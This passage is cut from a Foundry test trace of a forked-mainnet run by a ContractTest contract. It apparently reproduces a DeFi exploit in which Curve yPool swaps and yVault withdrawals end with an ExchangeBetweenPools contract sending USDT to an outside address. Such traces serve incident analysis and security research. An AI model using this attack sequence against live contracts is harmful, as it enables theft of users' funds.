    │   │   │   │   │   │   ├─ [3312] 0x3dfd23A6c5E8BbcFc9581d2E864a68feb6a076d3::getReserveNormalizedIncome(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [staticcall]
    │   │   │   │   │   │   │   ├─ [2569] 0x2847A5D7Ce69790cb40471d454FEB21A0bE1F2e3::getReserveNormalizedIncome(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003a9378a67805bd063f7d4f6
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003a9378a67805bd063f7d4f6
    │   │   │   │   │   │   └─ ← [Return] 355746811772 [3.557e11]
    │   │   │   │   │   ├─ [15172] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, 0), 2) [staticcall]
    │   │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], 2101112444 [2.101e9], 815523071572 [8.155e11]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000f951d4
    │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─ [509] 0xF013406A0B1d544238083DF0B93ad0d2cBE0f65f::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [553] 0x39AA39c021dfbaE8faC545936693aC917d5E7563::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [5992] USDC::transferFrom(curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], 0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, 119023523157 [1.19e11])
    │   │   │   │   │   │   ├─ [5197] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transferFrom(curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], 0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, 119023523157 [1.19e11]) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], to: 0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, value: 119023523157 [1.19e11])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x635b0924ad3ff062680f0aea3cfbd7f0ef6cb2bf55ef6efc316550a341c17ac3: 0x0000000000000000000000000000000000000000000000000000001bb65ad555 → 0
    │   │   │   │   │   │   │   │   @ 0x6ef731fbf0ed529ff2260972828b4a34c086d48d87e805ffaf308a71f1851fa8: 0x000000000000000000000000000000000000000000000000000000386d0a741a → 0x000000000000000000000000000000000000000000000000000000542365496f
    │   │   │   │   │   │   │   │   @ 0xc57933870e25484f1a32848b2d385f35ac8eda937f3a5cf7e840dbb4012cc47f: 0x0000000000000000000000000000000000000000000000000000001bb65ad555 → 0
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [1315] USDC::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 361371093359 [3.613e11]
    │   │   │   │   │   │   └─ ← [Return] 361371093359 [3.613e11]
    │   │   │   │   │   ├─ [6496] 0x9bA00D6856a4eDF4665BcA2C2309936572473B7E::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   │   ├─ [3312] 0x3dfd23A6c5E8BbcFc9581d2E864a68feb6a076d3::getReserveNormalizedIncome(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [staticcall]
    │   │   │   │   │   │   │   ├─ [2569] 0x2847A5D7Ce69790cb40471d454FEB21A0bE1F2e3::getReserveNormalizedIncome(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003a9378a67805bd063f7d4f6
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003a9378a67805bd063f7d4f6
    │   │   │   │   │   │   └─ ← [Return] 355746811772 [3.557e11]
    │   │   │   │   │   ├─ [15172] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, 0), 2) [staticcall]
    │   │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], 2101112444 [2.101e9], 815523071572 [8.155e11]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000f951d4
    │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─ [509] 0xF013406A0B1d544238083DF0B93ad0d2cBE0f65f::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [553] 0x39AA39c021dfbaE8faC545936693aC917d5E7563::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], value: 94621250181 [9.462e10])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xc57933870e25484f1a32848b2d385f35ac8eda937f3a5cf7e840dbb4012cc47f: 0x0000000000000000000000000000000000000000000000000000001bb65ad555 → 0
    │   │   │   │   │   │   @ 7: 0x0000000000000000000000000000000000000000000000000000008b41340396 → 0x000000000000000000000000000000000000000000000000000000a6f78ed8eb
    │   │   │   │   │   │   @ 6: 63452 → 63453
    │   │   │   │   │   │   @ 2: 0x0000000000000000000000000000000000000000000000000000006eb461eb8e → 0x00000000000000000000000000000000000000000000000000000084bc3f9e13
    │   │   │   │   │   │   @ 0x2b326c195b4bf13398fccd87e6e23fac6ff3d9dc0e93a62080b304ab12378cdd: 0x0000000000000000000000000000000000000000000000000000002f2aab9d42 → 0x0000000000000000000000000000000000000000000000000000004532894fc7
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [89968] 0x83f798e925BcD4017Eb265844FDDAbb448f1707D::withdraw(5936509122330897689 [5.936e18])
    │   │   │   │   │   ├─ [1031] USDT::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1032264538 [1.032e9]
    │   │   │   │   │   ├─ [803] 0x71fc860F7D3A592A4a98740e39dB31d25db65ae8::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [15130] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0x83f798e925BcD4017Eb265844FDDAbb448f1707D, 0), 0) [staticcall]
    │   │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 13804947768087488 [1.38e16], 1820393572179453153354 [1.82e21]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000bbde
    │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─ [509] 0xF013406A0B1d544238083DF0B93ad0d2cBE0f65f::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [3780] 0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   │   ├─ [2257] 0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9::delegateToImplementation(0x70a0823100000000000000000000000083f798e925bcd4017eb265844fddabb448f1707d) [staticcall]
    │   │   │   │   │   │   │   ├─ [600] 0x3363BAe2Fc44dA742Df13CD3ee94b6bB868ea376::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ emit Transfer(from: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], to: 0x0000000000000000000000000000000000000000, value: 5936509122330897689 [5.936e18])
    │   │   │   │   │   ├─ [1031] USDT::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1032264538 [1.032e9]
    │   │   │   │   │   ├─ [24801] USDT::transfer(curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], 47391215 [4.739e7])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x83f798e925BcD4017Eb265844FDDAbb448f1707D, to: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], value: 47391215 [4.739e7])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x59eeeba12578e687e664f3dd30fc04063e3d7d6d103f260d4ce00789662b3f9b: 0x000000000000000000000000000000000000000000000000000000003d871b5a → 0x000000000000000000000000000000000000000000000000000000003ab3f96b
    │   │   │   │   │   │   │   @ 0x22510e9e02d96ab71c7f73b52231824e7e4dc3cfec7d1c55572e3ae933a8a688: 0 → 0x0000000000000000000000000000000000000000000000000000000002d321ef
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [1031] USDT::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 984873323 [9.848e8]
    │   │   │   │   │   ├─ [803] 0x71fc860F7D3A592A4a98740e39dB31d25db65ae8::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [15130] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0x83f798e925BcD4017Eb265844FDDAbb448f1707D, 0), 0) [staticcall]
    │   │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 13804947768087488 [1.38e16], 1820393572179453153354 [1.82e21]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000bbde
    │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─ [509] 0xF013406A0B1d544238083DF0B93ad0d2cBE0f65f::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [3780] 0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   │   ├─ [2257] 0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9::delegateToImplementation(0x70a0823100000000000000000000000083f798e925bcd4017eb265844fddabb448f1707d) [staticcall]
    │   │   │   │   │   │   │   ├─ [600] 0x3363BAe2Fc44dA742Df13CD3ee94b6bB868ea376::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 6: 43381 → 43382
    │   │   │   │   │   │   @ 2: 0x000000000000000000000000000000000000000000000007028124f0ffd9ef7e → 0x000000000000000000000000000000000000000000000006b01e6d58fd73c265
    │   │   │   │   │   │   @ 8: 0x000000000000000000000000000000000000000000000000000000003d871b5a → 0x000000000000000000000000000000000000000000000000000000003ab3f96b
    │   │   │   │   │   │   @ 0x2b326c195b4bf13398fccd87e6e23fac6ff3d9dc0e93a62080b304ab12378cdd: 0x00000000000000000000000000000000000000000000000085289a2edfd4e519 → 0x00000000000000000000000000000000000000000000000032c5e296dd6eb800
    │   │   │   │   │   │   @ 0x22510e9e02d96ab71c7f73b52231824e7e4dc3cfec7d1c55572e3ae933a8a688: 0 → 0x0000000000000000000000000000000000000000000000000000000002d321ef
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [1031] USDT::balanceOf(curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 47391215 [4.739e7]
    │   │   │   │   ├─ [26801] USDT::transfer(ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D], 47391215 [4.739e7])
    │   │   │   │   │   ├─ emit Transfer(from: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], to: ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D], value: 47391215 [4.739e7])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xc76da16f37e3f4612e566ac0d49303a2cdf5d56e52fa333841364485ff4da720: 0 → 0x0000000000000000000000000000000000000000000000000000000002d321ef
    │   │   │   │   │   │   @ 0x22510e9e02d96ab71c7f73b52231824e7e4dc3cfec7d1c55572e3ae933a8a688: 0x0000000000000000000000000000000000000000000000000000000002d321ef → 0
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ emit TokenExchangeUnderlying(param0: ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D], param1: 1, param2: 119023523157 [1.19e11], param3: 2, param4: 47391215 [4.739e7])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2f82a5737c68d420b1e54627c6a68af82ff19c7003d17cd0c16d0313f5f3f47a: 0x0000000000000000000000000000000000000000000000000000001bb65ad555 → 0
    │   │   │   │   │   @ 8: 0x000000000000000000000000000000000000000000000000000000003d871b5a → 0x000000000000000000000000000000000000000000000000000000003ab3f96b
    │   │   │   │   │   @ 0xc57933870e25484f1a32848b2d385f35ac8eda937f3a5cf7e840dbb4012cc47f: 0 → 0x0000000000000000000000000000000000000000000000000000001bb65ad555
    │   │   │   │   │   @ 0x2b326c195b4bf13398fccd87e6e23fac6ff3d9dc0e93a62080b304ab12378cdd: 0x0000000000000000000000000000000000000000000000000000002f2aab9d42 → 0x0000000000000000000000000000000000000000000000000000004532894fc7
    │   │   │   │   │   @ 0x405787fa12a823e0f2b7631cc41b3ba8828b3321ca811111fa75cd3aa3bb5acf: 0x0000000000000000000000000000000000000000000000000000002f2aa1f188 → 0x00000000000000000000000000000000000000000000000000000045327fa40c
    │   │   │   │   │   @ 0x405787fa12a823e0f2b7631cc41b3ba8828b3321ca811111fa75cd3aa3bb5ad0: 0x000000000000000000000000000000000000000000000000641d5486ce25cec6 → 0x00000000000000000000000000000000000000000000000011b664a7ed737f58
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [1031] USDT::balanceOf(ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D]) [staticcall]
    │   │   │   │   └─ ← [Return] 47391215 [4.739e7]
    │   │   │   ├─ [11701] USDT::transfer(0x21A3dbeE594a3419D6037D6D8Cee0B1E10Bf345C, 47391215 [4.739e7])
    │   │   │   │   ├─ emit Transfer(from: ExchangeBetweenPools: [0x765b8d7Cd8FF304f796f4B6fb1BCf78698333f6D], to: 0x21A3dbeE594a3419D6037D6D8Cee0B1E10Bf345C, value: 47391215 [4.739e7])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x9e8bec266495e94a23a2df3395e1d16c4856b7e0768a4d16c770a25e0c3aa503: 0x000000000000000000000000000000000000000000000000000000193c80f1e3 → 0x000000000000000000000000000000000000000000000000000000193f5413d2
    │   │   │   │   │   @ 0xc76da16f37e3f4612e566ac0d49303a2cdf5d56e52fa333841364485ff4da720: 0x0000000000000000000000000000000000000000000000000000000002d321ef → 0
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x2f82a5737c68d420b1e54627c6a68af82ff19c7003d17cd0c16d0313f5f3f47a: 0 → 0x0000000000000000000000000000000000000000000000000000001bb65ad555
    │   │   │   └─ ← [Return] true
    │   │   ├─ [1031] USDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 71076010671 [7.107e10]
    │   │   ├─ [440796] curveYSwap::exchange_underlying(2, 1, 71076010671 [7.107e10], 0)
    │   │   │   ├─ [35413] 0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01::getPricePerFullShare() [staticcall]
    │   │   │   │   ├─ [602] 0x6B175474E89094C44Da98b954EedeAC495271d0F::balanceOf(0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01) [staticcall]
    │   │   │   │   │   └─ ← [Return] 31951343451222398754991 [3.195e22]
    │   │   │   │   ├─ [6496] 0xfC1E690f61EFd961294b3e1Ce3313fBD8aa4f85d::balanceOf(0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01) [staticcall]
    │   │   │   │   │   ├─ [3312] 0x3dfd23A6c5E8BbcFc9581d2E864a68feb6a076d3::getReserveNormalizedIncome(0x6B175474E89094C44Da98b954EedeAC495271d0F) [staticcall]
    │   │   │   │   │   │   ├─ [2569] 0x2847A5D7Ce69790cb40471d454FEB21A0bE1F2e3::getReserveNormalizedIncome(0x6B175474E89094C44Da98b954EedeAC495271d0F) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003d148a340c47c460b474173
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003d148a340c47c460b474173
    │   │   │   │   │   └─ ← [Return] 442096211614379858872543 [4.42e23]
    │   │   │   │   ├─ [15172] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01, 0), 3) [staticcall]
    │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(0x6B175474E89094C44Da98b954EedeAC495271d0F, 1304347360753391460608 [1.304e21], 1425467089982243776205052 [1.425e24]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000588c54
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [509] 0x493C57C4763932315A328269E1ADaD09653B9081::balanceOf(0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [4773] 0x5d3a536E4D6DbD6114cc1Ead35777bAB948E3643::balanceOf(0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01) [staticcall]
    │   │   │   │   │   ├─ [2257] 0x5d3a536E4D6DbD6114cc1Ead35777bAB948E3643::delegateToImplementation(0x70a0823100000000000000000000000016de59092dae5ccf4a1e6439d611fd0653f0bd01) [staticcall]
    │   │   │   │   │   │   ├─ [600] 0x3363BAe2Fc44dA742Df13CD3ee94b6bB868ea376::balanceOf(0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   └─ ← [Return] 1133529323263304087 [1.133e18]
    │   │   │   ├─ [31906] 0xd6aD7a6750A7593E092a9B218d66C0A814a3436e::getPricePerFullShare() [staticcall]
    │   │   │   │   ├─ [1315] USDC::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 361371093359 [3.613e11]
    │   │   │   │   │   └─ ← [Return] 361371093359 [3.613e11]
    │   │   │   │   ├─ [6496] 0x9bA00D6856a4eDF4665BcA2C2309936572473B7E::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   ├─ [3312] 0x3dfd23A6c5E8BbcFc9581d2E864a68feb6a076d3::getReserveNormalizedIncome(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [staticcall]
    │   │   │   │   │   │   ├─ [2569] 0x2847A5D7Ce69790cb40471d454FEB21A0bE1F2e3::getReserveNormalizedIncome(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003a9378a67805bd063f7d4f6
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000003a9378a67805bd063f7d4f6
    │   │   │   │   │   └─ ← [Return] 355746811772 [3.557e11]
    │   │   │   │   ├─ [15172] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0xd6aD7a6750A7593E092a9B218d66C0A814a3436e, 0), 2) [staticcall]
    │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], 2101112444 [2.101e9], 815523071572 [8.155e11]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000f951d4
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [509] 0xF013406A0B1d544238083DF0B93ad0d2cBE0f65f::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [553] 0x39AA39c021dfbaE8faC545936693aC917d5E7563::balanceOf(0xd6aD7a6750A7593E092a9B218d66C0A814a3436e) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   └─ ← [Return] 1257894214344724997 [1.257e18]
    │   │   │   ├─ [29076] 0x83f798e925BcD4017Eb265844FDDAbb448f1707D::getPricePerFullShare() [staticcall]
    │   │   │   │   ├─ [1031] USDT::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 984873323 [9.848e8]
    │   │   │   │   ├─ [803] 0x71fc860F7D3A592A4a98740e39dB31d25db65ae8::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [15130] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0x83f798e925BcD4017Eb265844FDDAbb448f1707D, 0), 0) [staticcall]
    │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 13804947768087488 [1.38e16], 1820393572179453153354 [1.82e21]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000bbde
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [509] 0xF013406A0B1d544238083DF0B93ad0d2cBE0f65f::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [3780] 0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [staticcall]
    │   │   │   │   │   ├─ [2257] 0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9::delegateToImplementation(0x70a0823100000000000000000000000083f798e925bcd4017eb265844fddabb448f1707d) [staticcall]
    │   │   │   │   │   │   ├─ [600] 0x3363BAe2Fc44dA742Df13CD3ee94b6bB868ea376::balanceOf(0x83f798e925BcD4017Eb265844FDDAbb448f1707D) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   └─ ← [Return] 7983010 [7.983e6]
    │   │   │   ├─ [31690] 0x73a052500105205d34Daf004eAb301916DA8190f::getPricePerFullShare() [staticcall]
    │   │   │   │   ├─ [1185] 0x0000000000085d4780B73119b644AE5ecd22b376::balanceOf(0x73a052500105205d34Daf004eAb301916DA8190f) [staticcall]
    │   │   │   │   │   ├─ [486] 0xB650eb28d35691dd1BD481325D40E65273844F9b::balanceOf(0x73a052500105205d34Daf004eAb301916DA8190f) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 85146961356411071020451 [8.514e22]
    │   │   │   │   │   └─ ← [Return] 85146961356411071020451 [8.514e22]
    │   │   │   │   ├─ [6496] 0x4DA9b813057D04BAef4e5800E36083717b4a0341::balanceOf(0x73a052500105205d34Daf004eAb301916DA8190f) [staticcall]
    │   │   │   │   │   ├─ [3312] 0x3dfd23A6c5E8BbcFc9581d2E864a68feb6a076d3::getReserveNormalizedIncome(0x0000000000085d4780B73119b644AE5ecd22b376) [staticcall]
    │   │   │   │   │   │   ├─ [2569] 0x2847A5D7Ce69790cb40471d454FEB21A0bE1F2e3::getReserveNormalizedIncome(0x0000000000085d4780B73119b644AE5ecd22b376) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000004239e4ca4ca1c6f47d10376
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000004239e4ca4ca1c6f47d10376
    │   │   │   │   │   └─ ← [Return] 272770619034611513332400 [2.727e23]
    │   │   │   │   ├─ [15130] 0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e::getAccountWei((0x73a052500105205d34Daf004eAb301916DA8190f, 0), 0) [staticcall]
    │   │   │   │   │   ├─ [2111] 0x0eED07cED0C8c36D4a5bfF44F2536422Bb09BE45::getInterestRate(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 13804947768087488 [1.38e16], 1820393572179453153354 [1.82e21]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000bbde
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ [509] 0x49f4592E641820e928F9919Ef4aBd92a719B4b49::balanceOf(0x73a052500105205d34Daf004eAb301916DA8190f) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [553] 0x39AA39c021dfbaE8faC545936693aC917d5E7563::balanceOf(0x73a052500105205d34Daf004eAb301916DA8190f) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   └─ ← [Return] 1219188455269113215 [1.219e18]
    │   │   │   ├─ [26830] USDT::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], 71076010671 [7.107e10])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: curveYSwap: [0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51], value: 71076010671 [7.107e10])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x22510e9e02d96ab71c7f73b52231824e7e4dc3cfec7d1c55572e3ae933a8a688: 0 → 0x000000000000000000000000000000000000000000000000000000108c75daaf
    │   │   │   │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0x000000000000000000000000000000000000000000000000000000108c75daaf → 0
